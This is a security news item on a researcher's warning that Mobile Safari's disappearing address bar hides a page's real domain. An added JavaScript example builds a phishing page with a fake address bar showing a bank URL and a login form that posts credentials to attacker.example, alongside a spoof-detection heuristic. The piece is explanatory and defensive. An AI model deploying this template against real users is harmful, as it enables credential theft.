
Researcher warns against iPhone phishing threat


Identity thieves can exploit the limited screen space on smartphones such as Apple's (NASDAQ:AAPL) iPhone to convince users that they are visiting a legitimate mobile website, according to a warning from security researcher Nitesh Dhanjani. Writing on the SANS Application Security Street Fighter Blog, Dhanjani notes that Mobile Safari shows the address bar only while a page is loading; as soon as the page has rendered, the bar scrolls out of view. A scammer can build a fake site that triggers the same behaviour to conceal its actual URL, leaving nothing on screen, apart from whatever the page itself chooses to draw, to tell the user which domain the content came from. "Perhaps this may give the user some time to notice but it is not a reasonably reliable control (and I donʼt think Apple intended it to be)," Dhanjani contends. "I did contact Apple about this issue and they let me know they are aware of the implications but do not know when and how they will address the issue."

Dhanjani chalks up the issue to limited screen space on mobile devices. "This is most likely the primary reason why the address bar disappears upon page load on the iPhone. Note that on the iPhone, this only happens for websites that follow directives in HTML to advertise themselves as mobile sites... Since the address bar in Safari occupies considerable real estate, perhaps Apple may consider displaying or scrolling the current domain name right below the universal status bar (i.e. below the carrier and time stamp). Positioning the current domain context in a location that is unalterable by the rendered web content can provide the users similar indication that browsers such as IE and Chrome provide by highlighting the current domain being rendered."

Dhanjani adds that because most iOS applications are full-screen, developers have every reason to keep users inside their application, rendering web content in place rather than handing the user off to Safari. "Given this situation, it becomes vital for iOS to provide consistency so the user can be ultimately assured what domain the web content is being rendered from," Dhanjani writes. "Given how rampant phishing and malware attempts are these days, I hope Apple chooses to not allow arbitrary web applications to scroll the real Safari address bar out of view."
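To make the spoof concrete, the following is an added example written for this article; it is not Dhanjani's demonstration page nor any Apple code. The first function builds the kind of page the article describes: a viewport directive that marks the page as a mobile site (the condition under which Safari hides its address bar), a fixed strip at the top that imitates an address bar and shows a bank's URL, and a sign-in form that posts to the attacker's own host. The scrollTo(0, 1) call is a common Mobile Safari idiom for hiding the address bar promptly after load and is an assumption, not something the article states. The second function is a crude heuristic a crawler or proxy could run: it flags a mobile-flagged page that pins an element to the top and shows, as visible text, a URL whose host differs from the host actually serving it. Hostnames and lookalike text are constructed placeholders.

```javascript
'use strict';

// Added illustration, not code from the SANS post or from Apple.
// Builds a page that reproduces the address-bar spoof described in the article.
function buildSpoofPage({ displayedUrl, servingHost }) {
  return `<!DOCTYPE html>
<html><head>
<meta charset="utf-8">
<!-- The viewport directive advertises this as a mobile site; per the article,
     Mobile Safari then scrolls its real address bar out of view after load. -->
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
<style>
  body { margin: 0; font-family: Helvetica, sans-serif; }
  /* Fake bar pinned to the top of the document, styled to resemble the
     browser's own address bar. */
  #fakebar { position: fixed; top: 0; left: 0; right: 0; height: 44px;
             background: #c8d0da; border-bottom: 1px solid #8a94a0; }
  #fakebar .url { margin: 8px; padding: 6px; background: #fff;
                  border: 1px solid #999; border-radius: 6px; }
  #content { padding-top: 60px; }
</style>
<script>
  // Assumption (not from the article): a widely used Mobile Safari idiom;
  // scrolling by one pixel after load hides the real address bar immediately
  // instead of waiting for the user to scroll.
  window.addEventListener('load', function () {
    setTimeout(function () { window.scrollTo(0, 1); }, 0);
  });
</script>
</head><body>
<div id="fakebar"><div class="url">${displayedUrl}</div></div>
<div id="content">
  <form method="post" action="https://${servingHost}/collect">
    <label>User ID <input name="user"></label>
    <label>Passcode <input name="pass" type="password"></label>
    <button type="submit">Sign In</button>
  </form>
</div>
</body></html>`;
}

// Heuristic detector (constructed for this example). Each signal on its own is
// common on legitimate mobile sites; all three together are the pattern the
// article describes: a mobile-flagged page that draws a top-pinned element and
// displays, as visible text, a URL for a host other than the one serving it.
function looksLikeAddressBarSpoof(html, servingHost) {
  const mobileFlag = /<meta[^>]+name=["']viewport["']/i.test(html);
  const pinnedTop = /position\s*:\s*fixed[^}]*top\s*:\s*0/i.test(html);

  // Visible text only: drop script/style bodies, then every tag (and with it
  // every attribute, so form actions and hrefs are not counted).
  const visible = html
    .replace(/<(script|style)[\s\S]*?<\/\1>/gi, ' ')
    .replace(/<[^>]+>/g, ' ');

  const hosts = [];
  const re = /https?:\/\/([a-z0-9.-]+)/gi;
  let m;
  while ((m = re.exec(visible)) !== null) hosts.push(m[1].toLowerCase());

  const foreignHost = hosts.some(h => h !== servingHost.toLowerCase());
  return mobileFlag && pinnedTop && foreignHost;
}

// Usage: build the spoof page and check that the heuristic flags it.
const demo = buildSpoofPage({
  displayedUrl: 'https://bank.example/login',   // what the victim sees
  servingHost: 'attacker.example'               // where the page really lives
});
console.log('spoof flagged:', looksLikeAddressBarSpoof(demo, 'attacker.example'));
```

The heuristic is deliberately narrow: a bank showing its own URL in a pinned header is not flagged, because the displayed host matches the serving host. It also says nothing about images, which is how a more careful attacker would draw the fake bar; the real fix Dhanjani asks for is a domain indicator the page cannot alter, not a content filter.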

For more:
- read this SANS blog entry
